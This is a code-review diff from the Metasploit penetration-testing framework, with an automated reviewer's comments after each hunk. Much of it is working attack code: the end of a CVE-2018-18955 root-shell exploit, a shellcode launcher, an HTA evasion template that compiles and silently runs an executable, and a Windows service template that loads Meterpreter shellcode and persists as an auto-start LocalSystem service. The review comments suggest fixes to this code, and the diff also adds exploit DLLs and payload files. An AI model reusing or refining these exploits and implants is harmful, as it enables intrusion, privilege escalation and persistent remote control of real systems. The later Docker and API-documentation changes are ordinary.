131
+
132
+  int i;
133
+  for (i = 0; found[needle_length + i] != ':'; i++) {
134
+    if (i >= max_length)
135
+      return -1;
136
+    if ((found - &buffer[0]) + needle_length + i >= length)
137
+      return -1;
138
+    output[i] = found[needle_length + i];
139
+  }
140
+
141
+  return 0;
142
+}
143
+
144
+
145
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
146
+
147
+int main(int argc, char** argv) {
148
+  if (argc > 1) SUBSHELL = argv[1];
149
+
150
+  dprintf("[.] starting\n");
151
+
152
+  dprintf("[.] setting up namespace\n");
153
+
154
+  int sync_pipe[2];
155
+  char dummy;
156
+
157
+  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
158
+    dprintf("[-] pipe\n");
159
+    exit(EXIT_FAILURE);
160
+  }
161
+
162
+  pid_t child = fork();
163
+
164
+  if (child == -1) {
165
+    dprintf("[-] fork");
166
+    exit(EXIT_FAILURE);
167
+  }
168
+
169
+  if (child == 0) {
170
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
171
+    close(sync_pipe[1]);
172
+
173
+    if (unshare(CLONE_NEWUSER) != 0) {
174
+      dprintf("[-] unshare(CLONE_NEWUSER)\n");
175
+      exit(EXIT_FAILURE);
176
+    }
177
+
178
+    if (unshare(CLONE_NEWNET) != 0) {
179
+      dprintf("[-] unshare(CLONE_NEWNET)\n");
180
+      exit(EXIT_FAILURE);
181
+    }
182
+
183
+    if (write(sync_pipe[0], "X", 1) != 1) {
184
+      dprintf("write to sock\n");
185
+      exit(EXIT_FAILURE);
186
+    }
187
+
188
+    if (read(sync_pipe[0], &dummy, 1) != 1) {
189
+      dprintf("[-] read from sock\n");
190
+      exit(EXIT_FAILURE);
191
+    }
192
+
193
+    if (setgid(0)) {
194
+      dprintf("[-] setgid");
195
+      exit(EXIT_FAILURE);
196
+    }
197
+
198
+    if (setuid(0)) {
199
+      printf("[-] setuid");
200
+      exit(EXIT_FAILURE);
201
+    }
202
+
203
+    execl(SUBSHELL, "", NULL);
204
+
205
+    dprintf("[-] executing subshell failed\n");
206
+  }
207
+
208
+  close(sync_pipe[0]);
209
+
210
+  if (read(sync_pipe[1], &dummy, 1) != 1) {
211
+    dprintf("[-] read from sock\n");
212
+    exit(EXIT_FAILURE);
213
+  }
214
+
215
+  char path[256];
216
+  sprintf(path, "/proc/%d/setgroups", (int)child);
217
+
218
+  if (write_file(path, "deny") == -1) {
219
+    dprintf("[-] denying setgroups failed\n");
220
+    exit(EXIT_FAILURE);
221
+  }
222
+
223
+  dprintf("[~] done, namespace sandbox set up\n");
224
+
225
+  dprintf("[.] mapping subordinate ids\n");
226
+  char subuid[64];
227
+  char subgid[64];
228
+
229
+  if (get_subuid(&subuid[0], sizeof(subuid))) {
230
+    dprintf("[-] couldn't find subuid map in /etc/subuid\n");
231
+    exit(EXIT_FAILURE);
232
+  }
233
+
234
+  if (get_subgid(&subgid[0], sizeof(subgid))) {
235
+    dprintf("[-] couldn't find subgid map in /etc/subgid\n");
236
+    exit(EXIT_FAILURE);
237
+  }
238
+
239
+  dprintf("[.] subuid: %s\n", subuid);
240
+  dprintf("[.] subgid: %s\n", subgid);
241
+
242
+  char cmd[256];
243
+
244
+  sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
245
+  if (system(cmd))  {
246
+    dprintf("[-] newuidmap failed");
247
+    exit(EXIT_FAILURE);
248
+  }
249
+
250
+  sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
251
+  if (system(cmd)) {
252
+    dprintf("[-] newgidmap failed");
253
+    exit(EXIT_FAILURE);
254
+  }
255
+
256
+  dprintf("[~] done, mapped subordinate ids\n");
257
+
258
+  dprintf("[.] executing subshell\n");
259
+
260
+  if (write(sync_pipe[1], "X", 1) != 1) {
261
+    dprintf("[-] write to sock");
262
+    exit(EXIT_FAILURE);
263
+  }
264
+
265
+  int status;
266
+  if (wait(&status) != child) {
267
+    dprintf("[-] wait");
268
+    exit(EXIT_FAILURE);
269
+  }
270
+
271
+  return 0;
272
+}
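Review bot: `get_subuid` and `get_subgid` dereference the result of `getpwuid(real_uid)` / `getgrgid(real_gid)` without a NULL check, so a uid or gid with no passwd/group entry crashes in `sprintf(needle, ...)` instead of returning -1. The copy loop that fills `output` also never writes a terminating NUL, yet `main` hands `subuid`/`subgid` — uninitialized stack arrays — to `%s` in `dprintf` and `sprintf`, so the strings are terminated only by luck; add `if (u == NULL) return -1;` after the lookup and `output[i] = '\0';` after the loop (bounding the check as `i >= max_length - 1`), in both functions. `read_file` likewise returns on every path without `close(f)`, leaking the descriptor on each call.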

BIN
data/exploits/cve-2018-18955/subuid_shell.out View File


+ 2
- 1
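--- a/data/exploits/evasion_shellcode.js
+++ b/data/exploits/evasion_shellcode.js
@@ -72,5 +72,6 @@ function ShellCodeExec()
   WaitForSingleObject(hThread, 0xFFFFFFFF);
 
 }
-
+try{
 ShellCodeExec();
+}catch(e){}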
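Review bot: The new `try{ ShellCodeExec(); }catch(e){}` discards every exception with no comment explaining why, so any failure inside `ShellCodeExec` (whose body lies above this hunk) disappears silently and is hard to diagnose when the script misbehaves. Either record or rethrow in the handler, or add a comment above the `try` stating that errors are deliberately ignored and why. The braces also break the spacing the file uses elsewhere (`WaitForSingleObject(hThread, 0xFFFFFFFF);`); `try {` and `} catch (e) {}` would match.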

+ 2
- 1
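--- a/data/exploits/hta_evasion.hta
+++ b/data/exploits/hta_evasion.hta
@@ -141,8 +141,9 @@
     var objShell = new ActiveXObject("WScript.shell");
     var js_f = path + "\\\\<%= fname %>.js";
     var ex = path + "\\\\<%= fname %>.exe";
+    var platform = "/platform:<%= arch %>";
 
-    objShell.run(comPath + " /out:" + ex + " " + js_f);
+    objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
     while(!fso.FileExists(ex)) { }
     
     objShell.run(ex, 0);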
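Review bot: The rewritten `objShell.run` line builds the compiler command out of six concatenated fragments with inconsistent spacing (`" /t:winexe "+ js_f`), which makes it easy to lose the separating space between flags. Assigning the command to a local first, `var cmd = comPath + " /out:" + ex + " " + platform + " /t:winexe " + js_f;` followed by `objShell.run(cmd, 0);`, keeps the flags readable and matches how `platform` is already held in its own variable. The trailing `0` is the `Run` window-style argument and deserves a short comment, as does the `<%= arch %>` interpolation, which is substituted verbatim and so relies on the Ruby side supplying a value the compiler accepts.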

BIN
data/exploits/juicypotato/juicypotato.x64.dll View File


BIN
data/exploits/juicypotato/juicypotato.x86.dll View File


+ 304
- 0
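--- /dev/null
+++ b/data/exploits/persistence_service/service.erb
@@ -0,0 +1,304 @@
+#include <String.h>
+#include <Windows.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+#define SERVICE_NAME     <%= @service_name.inspect %>
+#define DISPLAY_NAME     <%= @service_description.inspect %>
+#define RETRY_TIME       <%= @retry_time %>
+
+//
+// Globals
+//
+
+SERVICE_STATUS status;
+SERVICE_STATUS_HANDLE hStatus;
+
+//
+// Meterpreter connect back to host
+//
+
+void start_meterpreter()
+{
+// Your meterpreter shell here
+  <%= buf %>
+
+  LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+  memcpy(buffer,buf,sizeof(buf));
+  HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
+  WaitForSingleObject(hThread, -1); //INFINITE
+  CloseHandle(hThread);
+}
+
+//
+// Call self without parameter to start meterpreter
+//
+
+void self_call()
+{
+    char path[MAX_PATH];
+    char cmd[MAX_PATH];
+
+    if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
+        // Get module file name failed
+        return;
+    }
+
+    STARTUPINFO startup_info;
+    PROCESS_INFORMATION process_information;
+
+    ZeroMemory(&startup_info, sizeof(startup_info));
+    startup_info.cb = sizeof(startup_info);
+
+    ZeroMemory(&process_information, sizeof(process_information));
+
+    // If create process failed.
+    // CREATE_NO_WINDOW = 0x08000000
+    if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
+                      NULL, &startup_info, &process_information) == 0)
+    {
+        return;
+    }
+
+    // Wait until the process died.
+    WaitForSingleObject(process_information.hProcess, -1);
+}
+
+//
+// Process control requests from the Service Control Manager
+//
+
+VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
+{
+    switch (fdwControl) {
+        case SERVICE_CONTROL_STOP:
+        case SERVICE_CONTROL_SHUTDOWN:
+            status.dwWin32ExitCode = 0;
+            status.dwCurrentState = SERVICE_STOPPED;
+            break;
+
+        case SERVICE_CONTROL_PAUSE:
+            status.dwWin32ExitCode = 0;
+            status.dwCurrentState = SERVICE_PAUSED;
+            break;
+
+        case SERVICE_CONTROL_CONTINUE:
+            status.dwWin32ExitCode = 0;
+            status.dwCurrentState = SERVICE_RUNNING;
+            break;
+
+        default:
+            break;
+    }
+
+    if (SetServiceStatus(hStatus, &status) == 0) {
+        //printf("Cannot set service status (0x%08x)", GetLastError());
+        exit(1);
+    }
+
+    return;
+}
+
+
+//
+// Main function of service
+//
+
+VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
+{
+    // Register the service handler
+
+    hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
+
+    if (hStatus == 0) {
+        //printf("Cannot register service handler (0x%08x)", GetLastError());
+        exit(1);
+    }
+
+    // Initialize the service status structure
+
+    status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
+    status.dwCurrentState = SERVICE_RUNNING;
+    status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
+    status.dwWin32ExitCode = 0;
+    status.dwServiceSpecificExitCode = 0;
+    status.dwCheckPoint = 0;
+    status.dwWaitHint = 0;
+
+    if (SetServiceStatus(hStatus, &status) == 0) {
+        //printf("Cannot set service status (0x%08x)", GetLastError());
+        return;
+    }
+
+    // Start the Meterpreter
+    while (status.dwCurrentState == SERVICE_RUNNING) {
+        self_call();
+        Sleep(RETRY_TIME);
+    }
+
+    return;
+}
+
+
+//
+// Installs and starts the Meterpreter service
+//
+
+BOOL install_service()
+{
+    SC_HANDLE hSCManager;
+    SC_HANDLE hService;
+
+    char path[MAX_PATH];
+
+    // Get the current module name
+
+    if (!GetModuleFileName(NULL, path, MAX_PATH)) {
+        //printf("Cannot get module name (0x%08x)", GetLastError());
+        return FALSE;
+    }
+
+    // Build the service command line
+
+
+    char cmd[MAX_PATH];
+
+    int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
+    if (total_len < 0 || total_len >= sizeof(cmd)){
+        //printf("Cannot build service command line (0x%08x)", -1);
+        return FALSE;
+    }
+
+    cmd[0] = '\0';
+    strcat(cmd, "\"");
+    strcat(cmd, path);
+    strcat(cmd, "\" <%= @start_cmd %>");
+
+    // Open the service manager
+
+    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
+
+    if (hSCManager == NULL) {
+        //printf("Cannot open service manager (0x%08x)", GetLastError());
+        return FALSE;
+    }
+
+    // Create the service
+
+    hService = CreateService(
+        hSCManager,
+        SERVICE_NAME,
+        DISPLAY_NAME,
+        0xf01ff,            // SERVICE_ALL_ACCESS
+        SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
+        SERVICE_AUTO_START,
+        SERVICE_ERROR_NORMAL,
+        cmd,
+        NULL,
+        NULL,
+        NULL,
+        NULL,   /* LocalSystem account */
+        NULL
+    );
+
+    if (hService == NULL) {
+        //printf("Cannot create service (0x%08x)", GetLastError());
+
+        CloseServiceHandle(hSCManager);
+        return FALSE;
+    }
+
+    // Start the service
+
+    char* args[] = { path, "service" };
+
+    if (StartService(hService, 2, (const char**)&args) == 0) {
+        DWORD err = GetLastError();
+
+        if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
+        {
+            //printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
+
+            CloseServiceHandle(hService);
+            CloseServiceHandle(hSCManager);
+            return FALSE;
+        }
+    }
+
+    // Cleanup
+
+    CloseServiceHandle(hService);
+    CloseServiceHandle(hSCManager);
+
+    //printf("Service %s successfully installed.", SERVICE_NAME);
+
+    return TRUE;
+}
+
+//
+// Start the service
+//
+
+void start_service()
+{
+    SERVICE_TABLE_ENTRY ServiceTable[] =
+    {
+        { SERVICE_NAME, &ServiceMain },
+        { NULL, NULL }
+    };
+
+    if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
+        //printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
+        exit(1);
+    }
+}
+
+
+//
+// Main function
+//
+
+int main()
+{
+    // Parse the command line argument.
+    // For now, int main(int argc, char *argv) is buggy with metasm.
+    // So we choose this approach to achieve it.
+    LPTSTR cmdline;
+    cmdline = GetCommandLine();
+
+    char *argv[MAX_PATH];
+    char * ch = strtok(cmdline," ");
+    int argc = 0;
+
+    while (ch != NULL)
+    {
+       argv[argc] = malloc( strlen(ch)+1) ;
+       strncpy(argv[argc], ch, strlen(ch)+1);
+
+       ch = strtok (NULL, " ");
+       argc++;
+    }
+
+    if (argc > 1) {
+
+        if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
+
+            // Installs and starts the service
+
+            install_service();
+            return 0;
+        }
+        else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
+            // Starts the Meterpreter as a service
+
+            start_service();
+            return 0;
+        }
+    }
+
+    // Starts the Meterpreter as a normal application
+
+    start_meterpreter();
+
+    return 0;
+}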
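Review bot: `main` never bounds `argc` against the `char *argv[MAX_PATH]` array it fills, so a command line with more than MAX_PATH space-separated tokens writes past the end of `argv`; guarding the loop with `while (ch != NULL && argc < MAX_PATH)` closes that. Separately, `install_service` splices `<%= @start_cmd %>` raw into a C string literal while `main` compares against `<%= @start_cmd.inspect %>`, so a start command containing a quote or backslash breaks the literal but not the comparison; `strcat(cmd, "\" "); strcat(cmd, <%= @start_cmd.inspect %>);` keeps both sites escaped the same way. The `<%= 3 + @start_cmd.length %>` budget also counts Ruby characters rather than C bytes, which only matters for a non-ASCII start command but is worth a comment next to the expression. The tokens allocated with `malloc` in `main` are never freed, which is harmless for a short-lived process but should be stated in the comment above the loop if it is intentional.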

+ 13
- 0
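--- a/data/headers/windows/Windows.h
+++ b/data/headers/windows/Windows.h
@@ -252,6 +252,16 @@ typedef struct _OVERLAPPED {
 } OVERLAPPED, *LPOVERLAPPED;
 
 typedef DWORD SERVICE_STATUS_HANDLE;
+typedef VOID(WINAPI *LPHANDLER_FUNCTION)(DWORD);
+
+typedef void (WINAPI *LPSERVICE_MAIN_FUNCTION)(DWORD,LPSTR*);
+
+typedef struct _SERVICE_TABLE_ENTRY {
+	LPSTR lpServiceName;
+	LPSERVICE_MAIN_FUNCTION lpServiceProc;
+} SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
+
+typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
 
 typedef enum _SC_ENUM_TYPE {
         SC_ENUM_PROCESS_INFO = 0
@@ -540,3 +550,6 @@ WINAPI BOOL IsDebuggerPresent __attribute__((dllimport))(void);
 WINAPI BOOL CheckRemoteDebuggerPresent __attribute__((dllimport))(HANDLE, PBOOL);
 WINAPI NTSTATUS NtQueryInformationProcess __attribute__((dllimport))(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
 WINAPI void SetLastError __attribute__((dllimport))(DWORD);
+WINAPI SERVICE_STATUS_HANDLE RegisterServiceCtrlHandler __attribute__((dllimport))(LPCSTR, LPHANDLER_FUNCTION);
+BOOL WINAPI StartServiceCtrlDispatcher __attribute__((dllimport))(LPSERVICE_TABLE_ENTRY);
+LPTSTR WINAPI GetCommandLine __attribute__((dllimport))(void);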
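Review bot: The last typedef of the first hunk, `typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;`, redeclares the two names the struct typedef directly above it already introduces; redefining a typedef to the same type is only permitted from C11 on, and the self-referential form adds nothing, so the line can be dropped. In the second hunk, the existing prototypes put `WINAPI` before the return type (`WINAPI void SetLastError ...`) while the two new `StartServiceCtrlDispatcher` and `GetCommandLine` lines put it after; following the existing order keeps the header uniform and avoids a second pattern for whatever parses these declarations.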

+ 2
- 0
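--- a/data/headers/windows/stdlib.h
+++ b/data/headers/windows/stdlib.h
@@ -44,3 +44,5 @@ int system(const char*);
 long int labs(long int);
 div_t div(int, int);
 ldiv_t ldiv(long int, long int);
+void* malloc (size_t size);
+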
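Review bot: The new `malloc` prototype is the only declaration in the visible lines that puts a space before its parameter list and names its parameter, and the hunk also appends a trailing blank line; `void* malloc(size_t);` in the style of the neighbouring `ldiv_t ldiv(long int, long int);`, without the extra blank line, keeps the header consistent. Whether `size_t` is declared earlier in this header is not visible in the hunk and is worth confirming, since the template that relies on this prototype is compiled against these headers rather than the system ones.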

data/logos/under-construction-v5.txt → data/logos/metasploit-v5.txt View File

@@ -22,4 +22,4 @@ xMMMMMMMMMd                        ,0MMMMMMMMMMK;
22 22
 %red           'oOWMMMMMMMMo%clr                +:+
23 23
 %red               .,cdkO0K;%clr        :+:    :+:                                
24 24
                                 :::::::+:
25
-           %whiMetasploit%clr %yelUnder Construction%clr
25
+                      %whiMetasploit%clr

BIN
data/meterpreter/x64_osx_stage View File


+ 919
- 2
data/wordlists/joomla.txt
File diff suppressed because it is too large


+ 1
- 0
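--- a/data/wordlists/unix_users.txt
+++ b/data/wordlists/unix_users.txt
@@ -16,6 +16,7 @@ bin
 checkfs
 checkfsys
 checksys
+chronos
 cmwlogin
 couchdb
 daemon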

+ 1
- 0
data/ysoserial_payloads.json
File diff suppressed because it is too large


+ 3583
- 483
db/modules_metadata_base.json
File diff suppressed because it is too large


+ 1
- 1
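--- a/docker-compose.override.yml
+++ b/docker-compose.override.yml
@@ -9,6 +9,6 @@ services:
         BUNDLER_ARGS: --jobs=8
     image: metasploit:dev
     environment:
-      DATABASE_URL: postgres://postgres@db:5432/msf_dev
+      DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
     volumes:
       - .:/usr/src/metasploit-framework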
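Review bot: `pool=200` in the new DATABASE_URL lets this one container open up to 200 connections, which is above the stock PostgreSQL `max_connections` of 100, and the `db` service in docker-compose.yml, which receives the same `?pool=200&timeout=5` change, runs the unmodified `postgres:10-alpine` image; under load the pool can therefore exhaust the server and fail with connection errors instead of queueing. Either raise the server limit to match (the official postgres image accepts `command: postgres -c max_connections=200` on the `db` service) or choose a pool size the server can honour, and note the pairing in a comment beside the URL so the two numbers are changed together.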

+ 1
- 2
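--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -3,14 +3,13 @@ services:
   ms:
     image: metasploitframework/metasploit-framework:latest
     environment:
-      DATABASE_URL: postgres://postgres@db:5432/msf
+      DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
     links:
       - db
     ports:
       - 4444:4444
     volumes:
       - $HOME/.msf4:/home/msf/.msf4
-      - /etc/localtime:/etc/localtime:ro
 
   db:
     image: postgres:10-alpine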

+ 5
- 0
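--- /dev/null
+++ b/docker/database.yml
@@ -0,0 +1,5 @@
+development: &pgsql
+  url: <%= ENV['DATABASE_URL'] %>
+
+production: &production
+  <<: *pgsql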
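Review bot: `url: <%= ENV['DATABASE_URL'] %>` renders to an empty `url:` when the variable is unset, so a container started without DATABASE_URL gets a nil database URL and fails later with a less obvious error; `url: <%= ENV.fetch('DATABASE_URL') %>` makes the missing variable fail at configuration load with its name in the message. The `&production` anchor is defined but never referenced in this file, so it can be dropped unless something outside the file merges it.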

+ 22
- 11
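--- a/docker/entrypoint.sh
+++ b/docker/entrypoint.sh
@@ -5,16 +5,27 @@ MSF_GROUP=msf
 TMP=${MSF_UID:=1000}
 TMP=${MSF_GID:=1000}
 
-# don't recreate system users like root
-if [ "$MSF_UID" -lt "1000" ]; then
-  MSF_UID=1000
-fi
+# if the user starts the container as root or another system user,
+# don't use a low privileged user as we mount the home directory
+if [ "$MSF_UID" -eq "0" ]; then
+  "$@"
+else
+  # if the users group already exists, create a random GID, otherwise
+  # reuse it
+  if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
+    addgroup -g $MSF_GID $MSF_GROUP
+  else
+    addgroup $MSF_GROUP
+  fi
 
-if [ "$MSF_GID" -lt "1000" ]; then
-  MSF_GID=1000
+  # check if user id already exists
+  if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
+    adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
+    # add user to metasploit group so it can read the source
+    addgroup $MSF_USER $METASPLOIT_GROUP
+    su-exec $MSF_USER "$@"
+  # fall back to root exec if the user id already exists
+  else
+    "$@"
+  fi
 fi
-
-addgroup -g $MSF_GID $MSF_GROUP
-adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
-
-su-exec $MSF_USER "$@"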
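Review bot: `grep ":$MSF_UID:" /etc/passwd` is not anchored to the uid field, so a passwd entry whose primary-gid field equals $MSF_UID (the format is name:x:uid:gid:...) also matches, and the script then takes the new root fall-back for a uid that is actually free; the group check uses the same unanchored pattern. Matching the field explicitly avoids that: `if ! cut -d: -f3 /etc/passwd | grep -qx "$MSF_UID"; then` and `if ! cut -d: -f3 /etc/group | grep -qx "$MSF_GID"; then`. The comment above the group check reads inverted relative to the code, which creates the group with `-g $MSF_GID` when that gid is free and lets the system pick one when it is taken. Because the uid-collision branch silently runs `"$@"` as root, an `echo` to stderr naming the colliding uid before that `"$@"` would make the escalation visible in the container log, and the first comment should say "root" rather than "root or another system user", since only `-eq "0"` is tested.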

+ 9
- 14
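--- a/documentation/api/v1/auth_api_doc.rb
+++ b/documentation/api/v1/auth_api_doc.rb
@@ -15,26 +15,21 @@ module AuthApiDoc
   end
 
   swagger_path '/api/v1/auth/generate-token' do
-    # Swagger documentation for /api/v1/auth/generate-token GET
-    operation :get do
+    # Swagger documentation for /api/v1/auth/generate-token POST
+    operation :post do
 
       key :description, 'Return a valid Authorization Bearer token.'
       key :tags, [ 'auth' ]
 
       parameter do
-        key :name, :username
-        key :in, :query
-        key :description, 'The username for the user you want to authenticate.'
+        key :in, :body
+        key :name, :body
+        key :description, 'Login credentials for the user who will be generating a token.'
         key :required, true
-        key :type, :string
-      end
-
-      parameter do
-        key :name, :password
-        key :in, :query
-        key :description, 'The password for the user you want to authenticate.'
-        key :required, true
-        key :type, :string
+        schema do
+          property :username, type: :string, required: true
+          property :password, type: :string, required: true
+        end
       end
 
       response 200 do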
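Review bot: The new body schema marks each field with `required: true` on the `property`, while the `Realm` schema added in the same commit's credential_api_doc.rb uses the Swagger 2.0 form `key :required, [:key, :value]` on the schema object; the two should agree, and the array form is what schema validators read, so `key :required, [:username, :password]` inside the `schema do` block would be the consistent choice. Moving the credentials from query parameters into the request body is the right change, since query strings routinely end up in access logs and proxy caches; a short comment on the `operation :post do` line stating that this is why the method changed would preserve the reasoning.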

+ 17
- 1
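--- a/documentation/api/v1/credential_api_doc.rb
+++ b/documentation/api/v1/credential_api_doc.rb
@@ -33,6 +33,11 @@ module CredentialApiDoc
   DATA_EXAMPLE = "'password123', '$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1', or '$NT$7f8fe03093cc84b267b109625f6bbf4b'"
   JTR_FORMAT_DESC = 'Comma-separated list of the formats for John the ripper to use to try and crack this.'
   JTR_FORMAT_EXAMPLE = 'md5,des,bsdi,crypt'
+  KEY_DESC = 'The name of the key for the realm.'
+  KEY_EXAMPLE = 'Active Directory Domain'
+  VALUE_DESC = 'The value of the key for the realm.'
+  VALUE_EXAMPLE = 'contoso.com'
+
   PUBLIC_TYPE_ENUM = [ 'Metasploit::Credential::BlankUsername', 'Metasploit::Credential::Username' ]
   PRIVATE_TYPE_CLASS_ENUM = [
       'Metasploit::Credential::ReplayableHash',
@@ -108,6 +113,15 @@ module CredentialApiDoc
     property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
   end
 
+  swagger_schema :Realm do
+    key :required, [:key, :value]
+    property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
+    property :key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE
+    property :value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE
+    property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
+    property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
+  end
+
   swagger_path '/api/v1/credentials' do
     # Swagger documentation for /api/v1/credentials GET
     operation :get do
@@ -197,6 +211,8 @@ module CredentialApiDoc
           property :username, type: :string, description: USERNAME_DESC, example: USERNAME_EXAMPLE
           property :private_data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
           property :private_type, type: :string, description: PRIVATE_TYPE_DESC, enum: PRIVATE_TYPE_ENUM
+          property :realm_key, type: :string, description: KEY_DESC, enum: PRIVATE_TYPE_ENUM
+          property :realm_value, type: :string, description: VALUE_DESC, enum: PRIVATE_TYPE_ENUM
           property :jtr_format, type: :string, description: JTR_FORMAT_DESC, example: JTR_FORMAT_EXAMPLE
           property :address, type: :string, format: :ipv4, required: true, description: ADDRESS_DESC, example: ADDRESS_EXAMPLE
           property :port, type: :int32, format: :int32, description: PORT_DESC, example: PORT_EXAMPLE
@@ -312,7 +328,7 @@ module CredentialApiDoc
 
     #Swagger documentation for /api/v1/credentials/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing credential.'
+      key :description, 'Update the attributes on an existing credential.'
       key :tags, [ 'credential' ]
 
       parameter :update_id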
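Review bot: The two new POST body properties `realm_key` and `realm_value` in the third hunk carry `enum: PRIVATE_TYPE_ENUM`, which is the list of private-credential class names and has nothing to do with realm keys or values; the `private_type` line directly above them was evidently the copy template. The `Realm` schema added in the second hunk shows the intended shape: `property :realm_key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE` and `property :realm_value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE`. As written, the generated documentation tells clients that a realm key must be one of the credential class names.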

+ 104
- 1
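--- a/documentation/api/v1/event_api_doc.rb
+++ b/documentation/api/v1/event_api_doc.rb
@@ -10,7 +10,7 @@ module EventApiDoc
   SEEN_DESC = 'true if a user has acknowledged the event.'
   USERNAME_DESC = 'Name of the user that triggered the event.'
   INFO_DESC = 'Information about the event specific to the event name.'
-  INFO_EXAMPLE = '{:command=>"irb"}'
+  INFO_EXAMPLE = {command: 'irb'}
 
 # Swagger documentation for Event model
   swagger_schema :Event do
@@ -27,6 +27,69 @@ module EventApiDoc
   end
 
   swagger_path '/api/v1/events' do
+    # Swagger documentation for /api/v1/events GET
+    operation :get do
+      key :description, 'Return events that are stored in the database.'
+      key :tags, [ 'event' ]
+
+      parameter :workspace
+
+      parameter do
+        key :name, :limit
+        key :in, :query
+        key :description, RootApiDoc::LIMIT_DESC
+        key :example, RootApiDoc::LIMIT_DEFAULT
+        key :type, :integer
+        key :format, :int32
+        key :required, false
+      end
+
+      parameter do
+        key :name, :offset
+        key :in, :query
+        key :description, RootApiDoc::OFFSET_DESC
+        key :example, RootApiDoc::OFFSET_DEFAULT
+        key :type, :integer
+        key :format, :int32
+        key :required, false
+      end
+
+      parameter do
+        key :name, :order
+        key :in, :query
+        key :description, RootApiDoc::ORDER_DESC
+        key :type, :string
+        key :required, false
+        key :enum, RootApiDoc::ORDER_ENUM
+      end
+
+      response 200 do
+        key :description, 'Returns event data.'
+        schema do
+          property :data do
+            key :type, :array
+            items do
+              key :'$ref', :Event
+            end
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
     # Swagger documentation for /api/v1/events POST
     operation :post do
       key :description, 'Create an event.'
@@ -71,4 +134,44 @@ module EventApiDoc
       end
     end
   end
+
+  swagger_path '/api/v1/events/{id}' do
+    # Swagger documentation for /api/v1/events/:id GET
+    operation :get do
+      key :description, 'Return a specific event that is stored in the database.'
+      key :tags, [ 'event' ]
+
+      parameter do
+        key :name, :id
+        key :in, :path
+        key :description, 'ID of event to retrieve.'
+        key :required, true
+        key :type, :integer
+        key :format, :int32
+      end
+
+      response 200 do
+        key :description, 'Returns event data.'
+        schema do
+          property :data do
+            key :'$ref', :Event
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+  end
 end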
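Review bot: `INFO_EXAMPLE` changes from a String to the Hash `{command: 'irb'}` in the first hunk; if the `:info` property of the Event schema, which is declared just below that hunk outside the changed lines, is typed `type: :string` as INFO_DESC suggests, the example now disagrees with the declared type and schema validators will flag it, so the property type and the example should be changed together. In the new events GET, `limit` and `offset` state their defaults only inside the description text; adding `key :default, RootApiDoc::LIMIT_DEFAULT` and `key :default, RootApiDoc::OFFSET_DEFAULT` next to the `key :example` lines lets generated clients apply the defaults rather than merely display them.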

+ 1
- 1
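--- a/documentation/api/v1/host_api_doc.rb
+++ b/documentation/api/v1/host_api_doc.rb
@@ -266,7 +266,7 @@ module HostApiDoc
 
     # Swagger documentation for /api/v1/hosts/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing host.'
+      key :description, 'Update the attributes on an existing host.'
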